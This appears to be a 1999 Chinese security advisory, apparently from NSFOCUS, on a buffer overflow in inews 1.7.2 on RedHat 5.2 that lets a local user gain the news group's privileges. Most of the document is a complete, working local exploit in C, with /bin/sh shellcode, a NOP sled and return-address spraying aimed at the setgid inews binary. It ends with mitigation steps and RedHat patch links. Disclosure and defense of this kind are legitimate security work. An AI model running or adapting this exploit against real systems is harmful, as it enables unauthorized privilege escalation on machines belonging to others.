安全研究
安全漏洞
inews 缓冲区溢出漏洞
发布日期:1999-10-01
更新日期:1999-10-01
受影响系统:
Linux描述:
+RedHat 5.2
作者:warning3
inews是个检查news信件内容的工具.缺省被设置了news sgid位.
但它对含有一个很长的"From: "头的信件处理时,会发生溢出.导致
恶意用户获得news组权限,进而有可能导致获得root权限(理论上).
(好象"Sender: "头也应该会溢出,不过我没有成功)
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* Local exploit for inews-1.7.2 .
* It will give you "news" egid.
* Tested on RedHat 5.2
*
* Usage: $ gcc -o inv inv.c
* $ ./inv <buffsize> <offset> <align>
* Using address : 0xbffff890
* bash$ id
* uid=503(warning3) gid=504(warning3) egid=13(news) groups=504(warning3)
* If it don't work,try to change buffsize/offset/align .
* ( buffsize=800-950, offset=1200-1300, align=2 worked on my Redhat 5.2 )
*
* WARNING:
* This code is for educational purpose only and should not be run in
* any host without permission from the system administrator.
* warning3@hotmail.com
* 1999/09
*/
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#define DEFAULT_OFFSET 1300
#define DEFAULT_BUFFER_SIZE 800
#define NOP 0x90
#define article "hacknews"
char news[]="\nSubject: hacked\nNewsgroups: no.this.group\n\n";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
long get_sp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(int argc, char *argv[]) {
char *buff, *ptr;
long addr,*addr_ptr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int align=2,i,fd;
if (argc > 1) bsize=atoi(argv[1]);
if (argc > 2) offset=atoi(argv[2]);
if (argc > 3) align=atoi(argv[3]);
if(!(buff = malloc(bsize))) {
printf("can't allocate memory\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address : 0x%x\n",addr);
ptr = buff;
addr_ptr=(long *)(ptr+align);
for (i = align; i < bsize; i += 4)
*(addr_ptr++) = addr;
for (i = align; i < (bsize/2); i++)
buff[i] = NOP;
ptr=buff + (bsize/2) - strlen(shellcode)/2;
memcpy(ptr,shellcode,strlen(shellcode));
memcpy(buff,"From: ",6);
memcpy(buff+bsize-strlen(news)-1,news,strlen(news));
buff[bsize-1]='\0';
fd = open(article, O_RDWR|O_CREAT|O_TRUNC, 0600);
write (fd, buff, strlen(buff));
close(fd);
execl("/usr/bin/inews","inews","-h", article,NULL);
}
建议:
(1) chmod 0550 /usr/bin/inews
(2) 到RedHat网站上下载新的inn2.2.1 RPM包
Red Hat Linux 6.0:
==================
Intel:
ftp://updates.redhat.com//6.0/i386/inn-2.2.1-1.i386.rpm
ftp://updates.redhat.com//6.0/i386/inn-devel-2.2.1-1.i386.rpm
Alpha:
ftp://updates.redhat.com//6.0/alpha/inn-2.2.1-1.alpha.rpm
ftp://updates.redhat.com//6.0/alpha/inn-devel-2.2.1-1.alpha.rpm
Sparc:
ftp://updates.redhat.com//6.0/sparc/inn-2.2.1-1.sparc.rpm
ftp://updates.redhat.com//6.0/sparc/inn-devel-2.2.1-1.sparc.rpm
Source packages:
ftp://updates.redhat.com//6.0/SRPMS/inn-2.2.1-1.src.rpm
Red Hat Linux 5.2:
==================
Intel:
ftp://updates.redhat.com//5.2/i386/inn-2.2.1-0.5.2.i386.rpm
ftp://updates.redhat.com//5.2/i386/inn-devel-2.2.1-0.5.2.i386.rpm
Alpha:
ftp://updates.redhat.com//5.2/alpha/inn-2.2.1-0.5.2.alpha.rpm
ftp://updates.redhat.com//5.2/alpha/inn-devel-2.2.1-0.5.2.alpha.rpm
Sparc:
ftp://updates.redhat.com//5.2/sparc/inn-2.2.1-0.5.2.sparc.rpm
ftp://updates.redhat.com//5.2/sparc/inn-devel-2.2.1-0.5.2.sparc.rpm
Source packages:
ftp://updates.redhat.com//5.2/SRPMS/inn-2.2.1-0.5.2.src.rpm
Red Hat Linux 4.2:
==================
Intel:
ftp://updates.redhat.com//4.2/i386/inn-2.2.1-0.4.2.i386.rpm
ftp://updates.redhat.com//4.2/i386/inn-devel-2.2.1-0.4.2.i386.rpm
ftp://updates.redhat.com//4.2/noarch/cleanfeed-0.95.7b-0.4.2.noarch.rpm
Alpha:
ftp://updates.redhat.com//4.2/alpha/inn-2.2.1-0.4.2.alpha.rpm
ftp://updates.redhat.com//4.2/alpha/inn-devel-2.2.1-0.4.2.alpha.rpm
ftp://updates.redhat.com//4.2/noarch/cleanfeed-0.95.7b-0.4.2.noarch.rpm
Sparc:
ftp://updates.redhat.com//4.2/sparc/inn-2.2.1-0.4.2.sparc.rpm
ftp://updates.redhat.com//4.2/sparc/inn-devel-2.2.1-0.4.2.sparc.rpm
ftp://updates.redhat.com//4.2/noarch/cleanfeed-0.95.7b-0.4.2.noarch.rpm
Source packages:
ftp://updates.redhat.com//4.2/SRPMS/cleanfeed-0.95.7b-0.4.2.src.rpm
ftp://updates.redhat.com//4.2/SRPMS/inn-2.2.1-0.4.2.src.rpm
浏览次数:8011
严重程度:0(网友投票)
绿盟科技给您安全的保障